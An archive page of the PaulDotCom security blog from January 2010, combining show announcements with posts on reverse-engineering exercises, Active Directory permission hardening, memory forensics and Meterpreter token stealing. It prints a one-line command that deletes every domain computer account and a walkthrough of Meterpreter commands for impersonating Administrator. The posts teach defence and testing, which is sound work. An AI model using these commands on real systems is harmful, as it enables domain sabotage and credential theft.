The PaulDotCom crew discuss the stories of the week...
Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez
Audio Feeds: 
January 2010 Archives
Doug Burks who maintains the Security Onion project turned me on to the CSAW's Exercises for the burgeoning Army of ninjas. As I went through the challenges two things came to mind. First I thought it might make a good blog posting. Secondly I started reminiscing about Dungeons and Dragons' Pools of Radiance.
Pool's of Radiance was a Dungeons and Dragons simulation for my Commodore 64. The game was great, but in order to combat the software privacy that was so prevelant at the time Strategic Simulation, the games manufacturer, required that you enter a code off of a code wheel to play the game. If you didn't buy the game you supposedly wouldn't have a code wheel and you wouldn't be able to play. Well, I did have a code wheel, but having to dig it out every time I wanted to play was a pain. The result was my first soiree with assembly language. I didn't know what I was doing, but I quickly learned that by changing JZ, JNE, JE and other "conditional jumps" to JMP (an unconditional jump) I could alter the way the game operated and remove the required code wheel. This was of course prior to the DCMA. :) But the excitement only started there, I soon learned I could alter the code that took away my characters hit point, guarantee a successful attack every time and otherwise cheat my way to victory. My love for assembly coding was born.
The CSAW challenges are fun and educational. The skills you learn go beyond protecting Zelda's lifepoints! Going through the exercises will help you with analyzing malware, understanding software bugs and developing exploits.
So check out the exercises HERE
I haven't had a chance to go through all of them, but here are some video's with an overview of using OllyDbg of the first few. Thanks the Matasano and NYU and everyone at the CSAW for sharing them. If you like these challenges there are some similar training exercises on Bright Shadow and Crackmes.
Solution Exercises 1 & 2
Exercise 1 and 2 from PaulDotCom on Vimeo.
Solution Exercise 3
Exercise 3 from PaulDotCom on Vimeo.
Solution Exercises 4 & 5
Exercise 4 and 5 from PaulDotCom on Vimeo.
I will be teaching SANS 504 Incident Handling and Hacker Techniques in Raleigh Durham, NC June 21 through the 26. Register here!
Did you miss last night's live broadcast of Pauldotcom? If so you missed a great technical segment by Carlos Perez that demonstrated the new Metasploit java signed applet exploit. This exploit is a great example of how an attacker can gain access to systems that have no vulnerabilities by taking advantage of inherent weaknesses in the way products such as java applet signing are implemented.
Before you can use this exploit you will need to install a the java developers kit and the rjb ruby gem. Carlos explains how to do that in the show notes.
*Note: In this video I misspoke and said that LPORT is not being used. In fact, it is used by the meterpreter payload for its command and control communications channel.
Pauldotcom Episode 185 from PaulDotCom on Vimeo.
For detailed instructions check out Carlos' description in the show notes from last night. Join us every Thursday night at 7:30 at http://www.pauldotcom.com/liveI will be teaching SANS 504 Incident Handling and Hacker Techniques in Raleigh Durham NC Monday, June 21, 2010 - Saturday, June 26, 2010. Sign up today.
Please join us for an interview with David Maman, CTO of GreenSQL, a company creating an Open Source database firewall used to protect databases from SQL injection attacks.. Watch us live at 19:30 EST, Thursday January 28th for Episode 185 of PaulDotCom Security Weekly!
GreenSQL - an open source firewall, or a tasty Shepherd's Pie?
Please join the IRC channel during the stream - we can take live comments and discussion from the channel! Find us on IRC at irc.freenode.net #pauldotcom.
When active, the live stream(s) can be found at:
PaulDotCom Livestream - All new with Video and Chat! You can access the streaming videos at any time by visiting http://pauldotcom.com/live/
Break out your adult beverage of choice and join us, enjoy the show live, and thanks for listening!
- Paul, Larry, Carlos, Darren, John & Mick
The PaulDotCom crew go one on one with an FBI agent, no handcuffs this time!
No really, it sucks.
Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez
Audio Feeds:
Google/China/Auora crapola, security stuff, fixing the real problems.
This week we all rode the FUD train
Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez
Audio Feeds:
Didier Stevens comes on the show to talk about PDF hacking!
Chicken Corn Noodles are a valid PDF document
Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez
Audio Feeds:
Please join us for an interview with computer forensics expert Eric M. Fiterman to discuss his background as an FBI Special Agent, his current work at Methodvue, and his upcoming Shmoocon presentation on forensics in the Cloud. Watch us live at 19:30 EST, Thursday January 21st for Episode 184 of PaulDotCom Security Weekly!
Although Eric can neither confirm nor deny... Ah heck, he pretty much flat out denied.
Please join the IRC channel during the stream - we can take live comments and discussion from the channel! Find us on IRC at irc.freenode.net #pauldotcom.
When active, the live stream(s) can be found at:
PaulDotCom Livestream - All new with Video and Chat! You can access the streaming videos at any time by visiting http://pauldotcom.com/live/
Break out your adult beverage of choice and join us, enjoy the show live, and thanks for listening!
- Carlos, Larry, Mick, John, Darren, & Paul
Mick walks us through sneaky web crawling, GSM & DECT cracked, and more stories and tech news!
Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez
Audio Feeds:
We'll chat with Belgium Security Blogger Didier Stevens about Google adwords, pdf readers, twitter controlled Christmas trees and his unhealthy obsession with RFID tags. Watch us live at 19:30 EST, Thursday January 14th for Episode 183 of PaulDotCom Security Weekly.
Sensor overloaded after being exposed to the after effects of pizza and beer with PaulDotCom
Please join the IRC channel during the stream - we can take live comments and discussion from the channel! Find us on IRC at irc.freenode.net #pauldotcom.
When active, the live stream(s) can be found at:
PaulDotCom Livestream - All new with Video and Chat! You can access the streaming videos at any time by visiting http://pauldotcom.com/live/
Break out your adult beverage of choice and join us, enjoy the show live, and thanks for listening!
- John, Darren, Mick, Carlos, Paul, & Larry
Bruce Potter comes on the show to talk about the death of defense in depth, full disclosure, netflow analysis, trusted computing, and Lard.
Because sometimes you just need pure lard.
Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez
Audio Feeds:
Gone in 60 Seconds
The permissions assigned by many organizations through the Active Directories Delegation wizard and/or the computer account creation processes are more permissive then they should be. As a result, just about anyone can delete every computer account in an Active directory domain.
In Active Directory computers have accounts just like users. So as computers in your environment are deployed, or wiped and reloaded as a result of viruses, employee turnover, etc, technicians in the field need to have "Add computer account to the Domain" permissions or you need to give a few people permissions to stage the computer accounts. When you create a new computer object in AD (a staged account) you have the chance to define who can add that computer to your domain. (IMAGE1)
Picture of Add Computer Account Dialog w/ default permissions
You can see that by default Windows wants you to give "Domain Admins" permission to add the computer to the domain. Indeed, limiting this permission to Domain Admins is a pretty good idea as you will see in a minute. Limiting the permission to "Domain Admins" would be great from a security standpoint, but in most environments Domain Admin are pretty busy people are generally are not available to add every computer to the network. So organizations will change this privilege to a larger group such as "Authenticated Users" or "Everyone" as new staged computer object are created. Worse yet, in a some large environment even staging computer accounts may seem like a burden. In those organizations they often delegate the ability to add computers to the domain to a larger user base using the Active Directory Delegation Wizard or through group policy. As a matter of fact, this technet article from Microsoft walks users through giving all "Authenticated Users" the ability to add workstations to the domain. The end result is in many organizations the ability to "Add Computer Accounts to the Domain" are extended to a pretty large group of people. Often, everyone can add computers to the domain.
So is that bad? I have spoken with a few systems administrators who asked the question "Why not let everyone add their computer to the domain? You want everyone in your domain right? If someone wants to volunteer for password complexity requirements, screen savers time outs, etc why not let them?" Hmmm.... That sounds tempting. Why NOT let everyone add computers to the domain? Is this a case where the principle of least required access is wrong? No. In my opinion, there are very good reasons to limit who can add computer objects to your domain and this is just one of them.
Here is the problem, if you give Authenticated Users the ability to add a computer account they get the following permissions:
Allow DOMAIN\Authenticated Users SPECIAL ACCESS
DELETE
READ PERMISSONS
LIST CONTENTS
READ PROPERTY
DELETE TREE
LIST OBJECT
CONTROL ACCESS
As you can see, among the permissions that are assigned is the ability to DELETE that object. If these are the permissions assigned to all the computer objects in your domain then any authenticated user on your network could drop to a command prompt and delete ALL the computers in your domain with one simple command.
Any disgruntled authenticated user with a command prompt or piece of malware with a temper can execute "dsquery computer -limit 0 | dsrm" and you have a really really bad day on your hands. In one fell swoop every computer account in the domain is deleted.
Could all your computer object be deleted that easily? Chances are good that they could be. To know for sure, go through some of your computer objects and see what permissions are assigned to the objects. Who has the ability to delete your computer objects? This command will show you the permissions on your computer objects:
for /F "tokens=" %i in ('dsquery computer -limit 0') do dsacls %i | more
Need to fix it? dsacls.exe lets you set the permissions on your computer objects as well. So drop to a command prompt and figure out what the dsacls syntax is to set the appropriate permissions for your environment. Here is a reference on dsacls.
First figure out what permissions to set on one computer object doing something like this:
dsacls "CN=COMPNAME,OU=SomeOU,DC=DOMAINNAME,DC=com" /D "everyone":"SDDT;;"
Once you have the permissions setup for one object, run dsacls against all computer objects in the domain like this:
for /F "tokens=" %i in ('dsquery computer -limit 0') do dsacls %i /D "everyone":"SDDT;;"
Be sure to address both "Authenticated Users" and "Everyone". Keep in mind that you need to schedule these commands to be run on a regular interval to address new computer objects that are constantly being created. Of course the best solution is to limit who can join a computer to your domain when the computer account is created.
Here is some sample output from dsacls. In the example below "Domain\badaccess" is what you do NOT want "everyone" or "authenticated users" to have. The rest of the permissions are the defaults and do not put your computer objects at risk.
dsacls "CN=TEST Computer Account,OU=OUNAME,DC=DOMAINNAME,DC=com"
Allow DOMAIN\Domain Admins FULL CONTROL
Allow BUILTIN\Account Operators FULL CONTROL
Allow NT AUTHORITY\SYSTEM FULL CONTROL
Allow DOMAIN\badaccess SPECIAL ACCESS
DELETE
READ PERMISSONS
LIST CONTENTS
READ PROPERTY
DELETE TREE
LIST OBJECT
CONTROL ACCESS
Allow NT AUTHORITY\Authenticated Users SPECIAL ACCESS
READ PERMISSONS
LIST CONTENTS
READ PROPERTY
LIST OBJECT
Allow NT AUTHORITY\SELF SPECIAL ACCESS
CREATE CHILD
DELETE CHILD
Allow Domain\admingroup FULL CONTROL
Join us to commemorate the death of Defense in Depth with Bruce Potter. Eulogy live tonight at 19:30 EST, Thursday January 7th for Episode 182 of PaulDotCom Security Weekly.
"Defense in Depth: RIP"
Please join the IRC channel during the stream - we can take live comments and discussion from the channel! Find us on IRC at irc.freenode.net #pauldotcom.
When active, the live stream(s) can be found at:
PaulDotCom Livestream - All new with Video and Chat! You can access the streaming videos at any time by visiting http://pauldotcom.com/live/
Break out your adult beverage of choice and join us, enjoy the show live, and thanks for listening!
- Larry, Mick, Carlos, Paul, John, & Darren
What am I talking about? I am talking about RAM!
Here are some of the things we can get from RAM, processes, network connections, open files, Encryption Keys – Bitlocker.
The last one Encryption keys from Bitlocker is an awesome presentation I read from Jesse Kornblum on how to get the keys for bitlocker, check it out: http://jessekornblum.com/presentations/omfw08.pdf
There are simply some great tools to get memory, You can use win32dd.exe. This tool will create a raw image file as well as write a MD5 hash of the output file you create.
My personal favorite though is Memoryze from Mandiant. You can find it here as a free download http://www.mandiant.com The cool thing about memoryze is that you can run enumeration tools to give you process information, the registry keys that are being used by the process, what DLL's are running, drivers loaded in memory, etc... The great thing about this is that you can do that on an image that it can enumerate from or on a live machine.
Here is how it works:
Open a command shell (cmd.exe) Change directories to where you installed Memoryze.
Type “MemoryDD.bat” It will create a directory called audits where it will put your memory image or
To write the image to a specific directory, type “MemoryDD.bat –output <directory_name>
To identify all open ports and their processes and Process Id's, type “Process.bat –ports true"
The output is put in xml format:
Notice above you can see the process forcefield.exe as process ID 900 it is making a connection out to IP address 68.142.101.68 on Port 80 This is simply a great way to tell what process is doing what. (ie…malware outbound connections)
Now suppose you wanted to look for rootkit's in Memory. You can use Mandiant's HookDetection.bat file. This executes RootkitAudit.Batch.xml. It identifies hooks in kernel memory often used to subvert the integrity of the system. So you can see below the different processes and how the relate to the kernel or drivers etc…
Notice above you can see the module that has hooks into the kernel i.e 1394BUS.sys where it is located: \windows\system32\drivers\ and a description of it: “Driver”
If you had an unknown process with hooks into the kernel you could find it here.
Now these are all great tools but, what do you do with a memory image after you have it? There are some basic techniques that you can use to do analysis. I would start with a “strings” command. So you can run strings memory.img > memory.str. Then you can begin to parse the file for emails, websites surfed to, or connected to by malware, passwords, blogged text, and unknown executables.
Once you have your image, you might choose to use a tool called Volatility. This tool simply ROCKS!
Here is how it works using Linux:
python volatility command –f /path_to_windows_memory_image
The keyword command refers to a series of commands that you can choose from. Here is a list:
So what can we do with this? Let me show you. First let’s see what processes are running in memory.
first I type the command:
python volatility pslist –f /path_to_image/imagefile.img
and I will see output like this:
Now you can see the executables running. You can also see from the second column what the PID (Process ID) is. So let’s say we did not know what jusched.exe was. (PID 2228) and we thought it might be malware and would like to send it to virus total. Well then, let’s grab it right out of the memory.
python volatility procdump –p 2228 –f /path_to_image/imagefile.img
Now we have carved that process out. However to be sure we did this correctly let’s take a look at what it is using khexedit. Since this is suppose to be an .exe file it should start off in hex with MZ
so in linux khexedit executable.2228.exe
We can see that it is in fact what we are looking for so we could now send this up to virus total, or look deeper into the file to see what it does.
Well that is it for memory on this post. As always be good, be safe, hack legally, responsibly, and share the knowledge -–I’m Out
In revision 8055 HD committed new code that now allows the Meterpreter session if running as System to manipulate tokens in a much easier manner. Just like with incognito one can now get an access token and impersonate an account thru the Meterpreter Standard API, in fact I see both as complementing each other. Lets impersonate the Local Admin account on a Windows 2003 System using Incognito:
1: meterpreter > use incognito2: Loading extension incognito...success.3: meterpreter > list_tokens -u4:5: Delegation Tokens Available6: ========================================7: NT AUTHORITY\LOCAL SERVICE8: NT AUTHORITY\NETWORK SERVICE9: NT AUTHORITY\SYSTEM10: WIN2K3LAB01\Administrator11:12: Impersonation Tokens Available13: ========================================14: NT AUTHORITY\ANONYMOUS LOGON
From line 1 and 2 we can see that we have loaded the incognito extension, this will inject a DLL in to the process where Meterpreter is running to allow us to issue the commands. At line 3 we issue a command to list the tokens available to the attacker, System is the best privilege to have while executing this command since we will see all token on the host, if we are not running as System on the target machine we will only see those tokens that the account have used to connect to other systems with. Now we will change from our current running User ID to the Local Admin using incognito:
1: meterpreter > getuid2: Server username: NT AUTHORITY\SYSTEM3: meterpreter > impersonate_token WIN2K3LAB01\\Administrator4: [+] Delegation token available5: [+] Successfully impersonated user WIN2K3LAB01\Administrator6: meterpreter > getuid7: Server username: WIN2K3LAB01\Administrator
Now we have moved from System to Local Admin, this process is very useful for when attacking distributed system like Microsoft Active Directory where having local access only is not of great benefit but being able to move to the credentials for that system specially administrative credentials are of great value.
The new commands in Standard API are:
The following code map to the following code in lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
1: #2: # Obtains as many privileges as possible on the target machine.3: #4: def cmd_getprivs(*args)5: print_line("=" * 60)6: print_line("Enabled Process Privileges")7: print_line("=" * 60)8: client.sys.config.getprivs.each do |priv|9: print_line(" #{priv}")10: end11: print_line("")12: end13:14: #15: # Tries to steal the primary token from the target process.16: #17:18: def cmd_steal_token(*args)19: if(args.length != 1 or args[0] == "-h")20: print_error("Usage: steal_token [pid]")21: return22: end23: print_line("Stolen token with username: " + client.sys.config.steal_token(args[0]))24: end25:26: #27: # Drops any assumed token.28: #29:30: def cmd_drop_token(*args)31: print_line("Relinquished token, now running as: " + client.sys.config.drop_token())32: end
The drop_token command executes the function cmd_drop_token that as it can be seen in line 31 it will execute the API call client.sys.config.drop_token. The getprivs command execute sthe cmd_getprivs function that in turn executes the client.sys.config.getprivs API call which returns an Array of all the privileges the current user has. The steal_token command executes the cmd_steal_token function that in turn executes the client.sys.config.steal_token API call taking as required argument the PID of the process from whom to steal the token from if possible. As it can be seen 3 simple API calls from inside a Meterpreter session is all it takes, this makes scripting this actions for other scripts extremely easy and sets this framework apart from others.
Lets Impersonate a toke that we know runs under the Administrators Account like the process of explorer.exe for a logged on account. We will list the processes, steal its token, check our privileges and then drop the token.:
1: meterpreter > ps2:3: Process list4: ============5:6: PID Name Path7: --- ---- ----8: 268 smss.exe \SystemRoot\System32\smss.exe9: 320 csrss.exe \??\C:\WINDOWS\system32\csrss.exe10: 344 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe11: 392 services.exe C:\WINDOWS\system32\services.exe12: 404 lsass.exe C:\WINDOWS\system32\lsass.exe13: 600 vmacthlp.exe C:\Program Files\VMware\VMware Tools\vmacthlp.exe14: 620 svchost.exe C:\WINDOWS\system32\svchost.exe15: 700 svchost.exe C:\WINDOWS\system32\svchost.exe16: 756 svchost.exe C:\WINDOWS\system32\svchost.exe17: 784 svchost.exe C:\WINDOWS\system32\svchost.exe18: 820 svchost.exe C:\WINDOWS\System32\svchost.exe19: 964 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe20: 992 msdtc.exe C:\WINDOWS\system32\msdtc.exe21: 1104 dns.exe C:\WINDOWS\System32\dns.exe22: 1152 svchost.exe C:\WINDOWS\System32\svchost.exe23: 1216 svchost.exe C:\WINDOWS\system32\svchost.exe24: 1296 vmtoolsd.exe C:\Program Files\VMware\VMware Tools\vmtoolsd.exe25: 1368 VMUpgradeHelper.exe C:\Program Files\VMware\VMware Tools\VMUpgradeHelper.exe26: 1488 wmiprvse.exe C:\WINDOWS\system32\wbem\wmiprvse.exe27: 1560 svchost.exe C:\WINDOWS\System32\svchost.exe28: 1704 dllhost.exe C:\WINDOWS\system32\dllhost.exe29: 2164 Explorer.EXE C:\WINDOWS\Explorer.EXE30: 2228 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe31: 2236 VMwareUser.exe C:\Program Files\VMware\VMware Tools\VMwareUser.exe32: 2284 meter_224.exe C:\Documents and Settings\Administrator\Desktop\meter_224.exe33: 2352 wuauclt.exe C:\WINDOWS\system32\wuauclt.exe34: 2484 wmiprvse.exe C:\WINDOWS\system32\wbem\wmiprvse.exe35: 3076 svhost77.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\svhost77.exe36: 3096 taskmgr.exe C:\WINDOWS\system32\taskmgr.exe37: meterpreter > steal_token 216438: Stolen token with username: WIN2K3LAB01\Administrator39: meterpreter > getuid40: Server username: WIN2K3LAB01\Administrator41: meterpreter > drop_token42: Relinquished token, now running as: NT AUTHORITY\SYSTEM
We first executed the ps command to list all processes with the PID, we used the steal_token command in like 37 to steal the token for the explorer process that has the PID of 2164 and we confirm in line 39 with the getuid command that we are now running under that token, at line 41 we drop the token and return to run as System. The drop command is also useful for when impersonating a token using incongnito and we want to return.
The getprivs command will list all of the Windows System Process Level Privileges that are enabled:
1: meterpreter > getprivs2: ============================================================3: Enabled Process Privileges4: ============================================================5: SeDebugPrivilege6: SeTcbPrivilege7: SeAssignPrimaryTokenPrivilege8: SeLockMemoryPrivilege9: SeIncreaseQuotaPrivilege10: SeSecurityPrivilege11: SeTakeOwnershipPrivilege12: SeLoadDriverPrivilege13: SeSystemtimePrivilege14: SeProfileSingleProcessPrivilege15: SeIncreaseBasePriorityPrivilege16: SeCreatePagefilePrivilege17: SeCreatePermanentPrivilege18: SeBackupPrivilege19: SeRestorePrivilege20: SeShutdownPrivilege21: SeAuditPrivilege22: SeSystemEnvironmentPrivilege23: SeChangeNotifyPrivilege24: SeUndockPrivilege25: SeManageVolumePrivilege
As it can be seen the improvements on the Meterpreter ar being expanded and making it the best payload to be used against Windows System available in Metasploit. This new combination of token handling mixed with incognito and the ease in whish it can be scripted expands on the flexibility of Meterpreter and what can be done with it.
Note:
During the writing of this blog post the ps command was improved, it will now show under what privilege a process is running making the new set of commands even more useful
1: meterpreter > ps2:3: Process list4: ============5:6: PID Name Path User7: --- ---- ---- ----8: 268 smss.exe \SystemRoot\System32\smss.exe NT AUTHORITY\SYSTEM9: 300 svhost77.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\svhost77.exe NT AUTHORITY\SYSTEM10: 320 csrss.exe \??\C:\WINDOWS\system32\csrss.exe NT AUTHORITY\SYSTEM11: 344 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe NT AUTHORITY\SYSTEM12: 392 services.exe C:\WINDOWS\system32\services.exe NT AUTHORITY\SYSTEM13: 404 lsass.exe C:\WINDOWS\system32\lsass.exe NT AUTHORITY\SYSTEM14: 600 vmacthlp.exe C:\Program Files\VMware\VMware Tools\vmacthlp.exe NT AUTHORITY\SYSTEM15: 620 svchost.exe C:\WINDOWS\system32\svchost.exe NT AUTHORITY\SYSTEM16: 700 svchost.exe C:\WINDOWS\system32\svchost.exe NT AUTHORITY\NETWORK SERVICE17: 756 svchost.exe C:\WINDOWS\system32\svchost.exe NT AUTHORITY\NETWORK SERVICE18: 784 svchost.exe C:\WINDOWS\system32\svchost.exe NT AUTHORITY\LOCAL SERVICE19: 820 svchost.exe C:\WINDOWS\System32\svchost.exe NT AUTHORITY\SYSTEM20: 964 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe NT AUTHORITY\SYSTEM21: 992 msdtc.exe C:\WINDOWS\system32\msdtc.exe NT AUTHORITY\NETWORK SERVICE22: 1104 dns.exe C:\WINDOWS\System32\dns.exe NT AUTHORITY\SYSTEM23: 1152 svchost.exe C:\WINDOWS\System32\svchost.exe NT AUTHORITY\SYSTEM24: 1216 svchost.exe C:\WINDOWS\system32\svchost.exe NT AUTHORITY\LOCAL SERVICE25: 1296 vmtoolsd.exe C:\Program Files\VMware\VMware Tools\vmtoolsd.exe NT AUTHORITY\SYSTEM26: 1368 VMUpgradeHelper.exe C:\Program Files\VMware\VMware Tools\VMUpgradeHelper.exe NT AUTHORITY\SYSTEM27: 1560 svchost.exe C:\WINDOWS\System32\svchost.exe NT AUTHORITY\SYSTEM28: 1704 dllhost.exe C:\WINDOWS\system32\dllhost.exe NT AUTHORITY\SYSTEM29: 2164 Explorer.EXE C:\WINDOWS\Explorer.EXE WIN2K3LAB01\Administrator30: 2228 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe WIN2K3LAB01\Administrator31: 2236 VMwareUser.exe C:\Program Files\VMware\VMware Tools\VMwareUser.exe WIN2K3LAB01\Administrator32: 2352 wuauclt.exe C:\WINDOWS\system32\wuauclt.exe WIN2K3LAB01\Administrator33: 2484 wmiprvse.exe C:\WINDOWS\system32\wbem\wmiprvse.exe NT AUTHORITY\SYSTEM34: 3096 taskmgr.exe C:\WINDOWS\system32\taskmgr.exe WIN2K3LAB01\Administrator35:36: meterpreter >